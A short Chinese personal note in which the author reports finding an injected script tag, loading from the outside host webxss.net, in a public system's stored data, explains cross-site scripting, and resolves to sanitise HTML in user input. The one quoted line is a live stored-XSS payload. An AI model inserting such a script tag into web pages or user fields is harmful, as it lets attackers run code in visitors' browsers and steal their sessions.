今天在对外的一个系统数据中,看到有一段js 脚本
<script src="http://webxss.net/5gXMN8?1485559894"></script>
上网一搜,原来这就是传说中的网站XSS攻击,
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
为以后的系统备注一下,如果对外的系统要接收用户的数据,最好还是要规格化一下html等标签.以免被别人利用一些脚本攻击系统.